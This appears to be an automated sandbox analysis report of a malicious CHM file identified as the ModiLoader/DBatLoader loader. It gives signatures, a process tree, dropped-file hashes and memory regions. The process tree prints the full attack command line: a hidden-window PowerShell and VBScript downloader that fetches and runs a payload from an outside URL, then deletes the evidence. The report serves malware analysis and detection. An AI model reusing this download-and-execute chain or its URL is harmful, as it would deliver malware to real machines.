Analysis

  • max time kernel
    122s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    21-01-2025 03:36

General

  • Target

    a8f92f91412bcf71275883d86a3df7fdcc29d7ac3104f261e6e5d71f033ee101.chm

  • Size

    75KB

  • MD5

    92588daadcf11b3311b82e8b20219340

  • SHA1

    68c690da91c4a1cb0e7336b055ea87877a7b8b9d

  • SHA256

    a8f92f91412bcf71275883d86a3df7fdcc29d7ac3104f261e6e5d71f033ee101

  • SHA512

    38fa50cfad7f030712b9c8a81af995b0319075aa5e9ba3768d799bf13aa0532130d491bb6d90d0c8fbc2e8ffacc31e85629152d3281d4818eb8716d0f16cd523

  • SSDEEP

    1536:PRReoi9mRqozQM8I3FInJQqcN8HSsIN2i5reqgdMb0OYqFHPf:5Rez9kTAoFI7jq2i6qgGbzYOn

Malware Config

Signatures

  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

  • Modiloader family
  • ModiLoader Second Stage 62 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Executes dropped EXE 5 IoCs
  • Loads dropped DLL 6 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Hide Artifacts: Hidden Window 1 TTPs 1 IoCs

    Windows that would typically be displayed when an application carries out an operation can be hidden.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Kills process with taskkill 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Script User-Agent 2 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 42 IoCs

Processes

  • C:\Windows\hh.exe
    "C:\Windows\hh.exe" C:\Users\Admin\AppData\Local\Temp\a8f92f91412bcf71275883d86a3df7fdcc29d7ac3104f261e6e5d71f033ee101.chm
    1⤵
    • Modifies Internet Explorer settings
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2316
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c extrac32 /y /C C:\Windows\system32\cscript.exe C:\\Users\\Public\\ript.exe > nul && echo set a=createobject(^"adod^"+^"b.stream^"):set w=createobject(^"micro^"+^"soft.xmlhttp^"):w.open^"get^",wsh.arguments(0),0:w.send:a.type=1:a.open:a.write w.responsebody:a.savetofile wsh.arguments(1),2 >>C:\\Users\\Public\\aloha.vbs & powershell.exe -WindowStyle hidden -inputformat none -outputformat none -NonInteractive -Command "C:\\Users\\Public\\ript.exe C:\\Users\\Public\\aloha.vbs https://projectvends.org/WPS/PT.cmd C:\\Users\\Public\\df.cmd" & powershell.exe -WindowStyle hidden -inputformat none -outputformat none -NonInteractive -Command "start C:\\Users\\Public\\df.cmd ;Break" & del /q "C:\Users\Public\ript.exe" / A / F / Q / S >nul & del /q "C:\Users\Public\aloha.vbs" / A / F / Q / S >nul & taskkill /F /IM hh.exe & exit
      2⤵
      • Hide Artifacts: Hidden Window
      • Suspicious use of WriteProcessMemory
      PID:2808
      • C:\Windows\system32\extrac32.exe
        extrac32 /y /C C:\Windows\system32\cscript.exe C:\\Users\\Public\\ript.exe
        3⤵
          PID:2712
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -WindowStyle hidden -inputformat none -outputformat none -NonInteractive -Command "C:\\Users\\Public\\ript.exe C:\\Users\\Public\\aloha.vbs https://projectvends.org/WPS/PT.cmd C:\\Users\\Public\\df.cmd"
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Loads dropped DLL
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2828
          • C:\Users\Public\ript.exe
            "C:\Users\Public\ript.exe" C:\\Users\\Public\\aloha.vbs https://projectvends.org/WPS/PT.cmd C:\\Users\\Public\\df.cmd
            4⤵
            • Executes dropped EXE
            • Modifies system certificate store
            PID:2592
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -WindowStyle hidden -inputformat none -outputformat none -NonInteractive -Command "start C:\\Users\\Public\\df.cmd ;Break"
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2956
          • C:\Windows\system32\cmd.exe
            cmd /c ""C:\Users\Public\df.cmd" "
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:1656
            • C:\Windows\system32\extrac32.exe
              extrac32 /y "C:\Users\Public\df.cmd" "C:\Users\Admin\AppData\Local\Temp\x.exe"
              5⤵
                PID:2636
              • C:\Users\Admin\AppData\Local\Temp\x.exe
                "C:\Users\Admin\AppData\Local\Temp\x.exe"
                5⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Adds Run key to start application
                • Suspicious use of SetThreadContext
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: CmdExeWriteProcessMemorySpam
                • Suspicious use of WriteProcessMemory
                PID:2028
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c ""C:\Users\Public\HnqtinbxF.cmd" "
                  6⤵
                  • System Location Discovery: System Language Discovery
                  PID:2344
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c C:\Users\Public\Libraries\FX.cmd
                  6⤵
                  • System Location Discovery: System Language Discovery
                  PID:2492
                  • C:\Windows \SysWOW64\svchost.pif
                    "C:\Windows \SysWOW64\svchost.pif"
                    7⤵
                    • Executes dropped EXE
                    PID:2280
                  • C:\Windows \SysWOW64\svchost.pif
                    "C:\Windows \SysWOW64\svchost.pif"
                    7⤵
                    • Executes dropped EXE
                    PID:2600
                • C:\Users\Public\Libraries\xbnitqnH.pif
                  C:\Users\Public\Libraries\xbnitqnH.pif
                  6⤵
                  • Executes dropped EXE
                  PID:2396
          • C:\Windows\system32\taskkill.exe
            taskkill /F /IM hh.exe
            3⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2756

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\x.exe

        Filesize

        988KB

        MD5

        1d72e2b8a6cb15d3669376eadc4d4b09

        SHA1

        953c07f56947255c2974049349a3ac019c74f472

        SHA256

        6943783baf38adb80a064fb099a753de317015f0b660e3b4f3b1c201cfbdf3ac

        SHA512

        a476a17e7eb315b25ace3101ed5ad05964d3cbb14a9a212e1f2de030d2dc945d7d2f14b0b9df4e85db601b100d78e9e50fa189df348ad4c1548d41bdd1d7c883

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

        Filesize

        7KB

        MD5

        ea6bf1ef41a6b9474313093e947e08e4

        SHA1

        51c862a1a540af1bc1be0f8f218ec270c61a8bed

        SHA256

        bf1d5b491039b5296f78514fe5ac671ca35721578031e1214b05abe866d958fd

        SHA512

        67912988f56e3042bd5271903c7f68eac418acc02c80353f4a2a414222f026c4d3d1c7a5357898748c20fd63c31e554482d278e1e71e05591d3b39a2e186b4ed

      • C:\Users\Public\HnqtinbxF.cmd

        Filesize

        11KB

        MD5

        f82aeb3b12f33250e404df6ec873dd1d

        SHA1

        bcf538f64457e8d19da89229479cafa9c4cce12f

        SHA256

        23b7417b47c7efb96fb7ce395e325dc831ab2ee03eadda59058d31bdbe9c1ea6

        SHA512

        6f9d6daeed78f45f0f83310b95f47cc0a96d1db1d7f6c2e2485d7a8ecb04fee9865eec3599fee2d67f3332f68a70059f1a6a40050b93ef44d55632c24d108977

      • C:\Users\Public\Libraries\FX.cmd

        Filesize

        8KB

        MD5

        7821e3de3812e791cf3b223500d73bc9

        SHA1

        5e211b634ce77e6fee83ce8a5b8c9a37c8b81e1d

        SHA256

        3daa7f9eee129f61f7a452f7150ee21a1c4141586a37f37842b9c3bb53152a74

        SHA512

        6eae270065401626df97b73a255578bf27b4f4dea480954843823046ad95e40cf706c1a767c8765ef3ab48ea3a18498375614317ec00a9ef29a4dd21edbc5f26

      • C:\Users\Public\aloha.vbs

        Filesize

        194B

        MD5

        71efa4ec6c67fa5665b1d0c64d60fc25

        SHA1

        f546eda2b94df327b7ad5fa5bb0ba20cd37b2623

        SHA256

        08212be8f6fd3d4312f20a7604807c04da643333f07267c7e9713a452e079898

        SHA512

        7b1bbbb23e21cd011964397860b1cf5bdebbd20b6b3d5317c13ff5b3bdb0223a51c036be2b730254c11725a69c34ab90d2ae24872af788e076914364a82b31d6

      • C:\Users\Public\df.cmd

        Filesize

        988KB

        MD5

        3353a1cc2a5dabca2e40faa9d5520cf4

        SHA1

        a98b8be630118989f3beceecc34fd524dae0f05c

        SHA256

        5c1f323caf7247e020dcfcd4cfc413afb6a19828fd4f9099c24f3635c62c8698

        SHA512

        fa4e3f1c4b7dfcc66c6c4d8fd2a91821d5a06bc9c282b03b15392e1bb6175d2679837a8d3143bf7b32ed252bacd8c295337a2fec11cefc3deda70a02215d4930

      • C:\Windows \SysWOW64\svchost.pif

        Filesize

        94KB

        MD5

        869640d0a3f838694ab4dfea9e2f544d

        SHA1

        bdc42b280446ba53624ff23f314aadb861566832

        SHA256

        0db4d3ffdb96d13cf3b427af8be66d985728c55ae254e4b67d287797e4c0b323

        SHA512

        6e775cfb350415434b18427d5ff79b930ed3b0b3fc3466bc195a796c95661d4696f2d662dd0e020c3a6c3419c2734468b1d7546712ecec868d2bbfd2bc2468a7

      • \Users\Public\Libraries\xbnitqnH.pif

        Filesize

        171KB

        MD5

        22331abcc9472cc9dc6f37faf333aa2c

        SHA1

        2a001c30ba79a19ceaf6a09c3567c70311760aa4

        SHA256

        bdfa725ec2a2c8ea5861d9b4c2f608e631a183fca7916c1e07a28b656cc8ec0c

        SHA512

        c7f5baad732424b975a426867d3d8b5424aa830aa172ed0ff0ef630070bf2b4213750e123a36d8c5a741e22d3999ca1d7e77c62d4b77d6295b20a38114b7843c

      • \Users\Public\ript.exe

        Filesize

        152KB

        MD5

        791af7743252d0cd10a30d61e5bc1f8e

        SHA1

        70096a77e202cf9f30c064956f36d14bcbd8f7bb

        SHA256

        e34910c8c4f2051b1b87f80e9b389dfe3583bb3e4da909bb2544f22c2d92cf15

        SHA512

        d564f20748189de62525d2c0d4a199a272e3b273a38bd2ccd0bd7f9141f118eae08223b2a0739cd9bdf73234a0f0fb3566eaf88884462e494d44617bd9ac3ccb

      • memory/2028-129-0x00000000030D0000-0x00000000040D0000-memory.dmp

        Filesize

        16.0MB

      • memory/2028-122-0x00000000030D0000-0x00000000040D0000-memory.dmp

        Filesize

        16.0MB

      • memory/2028-109-0x00000000030D0000-0x00000000040D0000-memory.dmp

        Filesize

        16.0MB

      • memory/2028-108-0x00000000030D0000-0x00000000040D0000-memory.dmp

        Filesize

        16.0MB

      • memory/2028-106-0x00000000030D0000-0x00000000040D0000-memory.dmp

        Filesize

        16.0MB

      • memory/2028-104-0x00000000030D0000-0x00000000040D0000-memory.dmp

        Filesize

        16.0MB

      • memory/2028-102-0x00000000030D0000-0x00000000040D0000-memory.dmp

        Filesize

        16.0MB

      • memory/2028-100-0x00000000030D0000-0x00000000040D0000-memory.dmp

        Filesize

        16.0MB

      • memory/2028-99-0x00000000030D0000-0x00000000040D0000-memory.dmp

        Filesize

        16.0MB

      • memory/2028-96-0x00000000030D0000-0x00000000040D0000-memory.dmp

        Filesize

        16.0MB

      • memory/2028-95-0x00000000030D0000-0x00000000040D0000-memory.dmp

        Filesize

        16.0MB

      • memory/2028-93-0x00000000030D0000-0x00000000040D0000-memory.dmp

        Filesize

        16.0MB

      • memory/2028-91-0x00000000030D0000-0x00000000040D0000-memory.dmp

        Filesize

        16.0MB

      • memory/2028-89-0x00000000030D0000-0x00000000040D0000-memory.dmp

        Filesize

        16.0MB

      • memory/2028-86-0x00000000030D0000-0x00000000040D0000-memory.dmp

        Filesize

        16.0MB

      • memory/2028-85-0x00000000030D0000-0x00000000040D0000-memory.dmp

        Filesize

        16.0MB

      • memory/2028-83-0x00000000030D0000-0x00000000040D0000-memory.dmp

        Filesize

        16.0MB

      • memory/2028-81-0x00000000030D0000-0x00000000040D0000-memory.dmp

        Filesize

        16.0MB

      • memory/2028-79-0x00000000030D0000-0x00000000040D0000-memory.dmp

        Filesize

        16.0MB

      • memory/2028-77-0x00000000030D0000-0x00000000040D0000-memory.dmp

        Filesize

        16.0MB

      • memory/2028-74-0x00000000030D0000-0x00000000040D0000-memory.dmp

        Filesize

        16.0MB

      • memory/2028-76-0x00000000030D0000-0x00000000040D0000-memory.dmp

        Filesize

        16.0MB

      • memory/2028-143-0x00000000030D0000-0x00000000040D0000-memory.dmp

        Filesize

        16.0MB

      • memory/2028-141-0x00000000030D0000-0x00000000040D0000-memory.dmp

        Filesize

        16.0MB

      • memory/2028-138-0x00000000030D0000-0x00000000040D0000-memory.dmp

        Filesize

        16.0MB

      • memory/2028-136-0x00000000030D0000-0x00000000040D0000-memory.dmp

        Filesize

        16.0MB

      • memory/2028-71-0x00000000030D0000-0x00000000040D0000-memory.dmp

        Filesize

        16.0MB

      • memory/2028-134-0x00000000030D0000-0x00000000040D0000-memory.dmp

        Filesize

        16.0MB

      • memory/2028-132-0x00000000030D0000-0x00000000040D0000-memory.dmp

        Filesize

        16.0MB

      • memory/2028-65-0x00000000030D0000-0x00000000040D0000-memory.dmp

        Filesize

        16.0MB

      • memory/2028-127-0x00000000030D0000-0x00000000040D0000-memory.dmp

        Filesize

        16.0MB

      • memory/2028-125-0x00000000030D0000-0x00000000040D0000-memory.dmp

        Filesize

        16.0MB

      • memory/2028-70-0x00000000030D0000-0x00000000040D0000-memory.dmp

        Filesize

        16.0MB

      • memory/2028-72-0x00000000030D0000-0x00000000040D0000-memory.dmp

        Filesize

        16.0MB

      • memory/2028-120-0x00000000030D0000-0x00000000040D0000-memory.dmp

        Filesize

        16.0MB

      • memory/2028-119-0x00000000030D0000-0x00000000040D0000-memory.dmp

        Filesize

        16.0MB

      • memory/2028-117-0x00000000030D0000-0x00000000040D0000-memory.dmp

        Filesize

        16.0MB

      • memory/2028-114-0x00000000030D0000-0x00000000040D0000-memory.dmp

        Filesize

        16.0MB

      • memory/2028-112-0x00000000030D0000-0x00000000040D0000-memory.dmp

        Filesize

        16.0MB

      • memory/2028-110-0x00000000030D0000-0x00000000040D0000-memory.dmp

        Filesize

        16.0MB

      • memory/2028-107-0x00000000030D0000-0x00000000040D0000-memory.dmp

        Filesize

        16.0MB

      • memory/2028-69-0x00000000030D0000-0x00000000040D0000-memory.dmp

        Filesize

        16.0MB

      • memory/2028-105-0x00000000030D0000-0x00000000040D0000-memory.dmp

        Filesize

        16.0MB

      • memory/2028-103-0x00000000030D0000-0x00000000040D0000-memory.dmp

        Filesize

        16.0MB

      • memory/2028-101-0x00000000030D0000-0x00000000040D0000-memory.dmp

        Filesize

        16.0MB

      • memory/2028-98-0x00000000030D0000-0x00000000040D0000-memory.dmp

        Filesize

        16.0MB

      • memory/2028-68-0x00000000030D0000-0x00000000040D0000-memory.dmp

        Filesize

        16.0MB

      • memory/2028-97-0x00000000030D0000-0x00000000040D0000-memory.dmp

        Filesize

        16.0MB

      • memory/2028-94-0x00000000030D0000-0x00000000040D0000-memory.dmp

        Filesize

        16.0MB

      • memory/2028-92-0x00000000030D0000-0x00000000040D0000-memory.dmp

        Filesize

        16.0MB

      • memory/2028-67-0x00000000030D0000-0x00000000040D0000-memory.dmp

        Filesize

        16.0MB

      • memory/2028-90-0x00000000030D0000-0x00000000040D0000-memory.dmp

        Filesize

        16.0MB

      • memory/2028-88-0x00000000030D0000-0x00000000040D0000-memory.dmp

        Filesize

        16.0MB

      • memory/2028-87-0x00000000030D0000-0x00000000040D0000-memory.dmp

        Filesize

        16.0MB

      • memory/2028-84-0x00000000030D0000-0x00000000040D0000-memory.dmp

        Filesize

        16.0MB

      • memory/2028-82-0x00000000030D0000-0x00000000040D0000-memory.dmp

        Filesize

        16.0MB

      • memory/2028-66-0x00000000030D0000-0x00000000040D0000-memory.dmp

        Filesize

        16.0MB

      • memory/2028-80-0x00000000030D0000-0x00000000040D0000-memory.dmp

        Filesize

        16.0MB

      • memory/2028-78-0x00000000030D0000-0x00000000040D0000-memory.dmp

        Filesize

        16.0MB

      • memory/2028-75-0x00000000030D0000-0x00000000040D0000-memory.dmp

        Filesize

        16.0MB

      • memory/2028-73-0x00000000030D0000-0x00000000040D0000-memory.dmp

        Filesize

        16.0MB

      • memory/2028-62-0x00000000030D0000-0x00000000040D0000-memory.dmp

        Filesize

        16.0MB

      • memory/2028-61-0x00000000030D0000-0x00000000040D0000-memory.dmp

        Filesize

        16.0MB

      • memory/2828-26-0x0000000001D80000-0x0000000001D88000-memory.dmp

        Filesize

        32KB

      • memory/2828-25-0x000000001B910000-0x000000001BBF2000-memory.dmp

        Filesize

        2.9MB

      • memory/2956-53-0x000000001B830000-0x000000001BB12000-memory.dmp

        Filesize

        2.9MB

      • memory/2956-54-0x00000000002B0000-0x00000000002B8000-memory.dmp

        Filesize

        32KB